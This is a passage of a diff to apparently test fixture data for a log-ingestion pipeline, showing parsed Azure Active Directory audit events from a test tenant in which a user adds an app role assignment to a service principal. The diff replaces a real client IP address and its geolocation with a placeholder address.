\"Value\":\"R5\"}],\"Id\":\"256e3859-87ca-4b23-b2c0-45a26ccd7925\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125311600Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8071361Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622707\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"256e3859-87ca-4b23-b2c0-45a26ccd7925\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -17229,25 +15735,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -17261,7 +15749,7 @@
 "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -17397,7 +15885,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -17409,12 +15897,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036537100Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8821342Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622751\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"411fc666-cabf-4cb0-b8a3-e5a2cc515b79\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.125318200Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8821342Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622751\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",
\"Value\":\"R5\"}],\"Id\":\"411fc666-cabf-4cb0-b8a3-e5a2cc515b79\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -17440,25 +15928,7 @@ }, { "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "as": { - "number": 3352, - "organization": { - "name": "Telefonica De Espana" - } - }, - "ip": "83.57.233.151" + "ip": "67.43.156.15" }, "tags": [ "preserve_original_event" @@ -17472,7 +15942,7 @@ "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", "ResultStatus": "Success", "UserKey": "1003200096971F55@testsiem.onmicrosoft.com", - "ActorIpAddress": "83.57.233.151", + "ActorIpAddress": "67.43.156.15", "ExtendedProperties": { "actorObjectClass": "User", "teamName": "MSODS.", @@ -17608,7 +16078,7 @@ "asr" ], "ip": [ - "83.57.233.151" + "67.43.156.15" ] }, "organization": { 
@@ -17620,12 +16090,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036542800Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 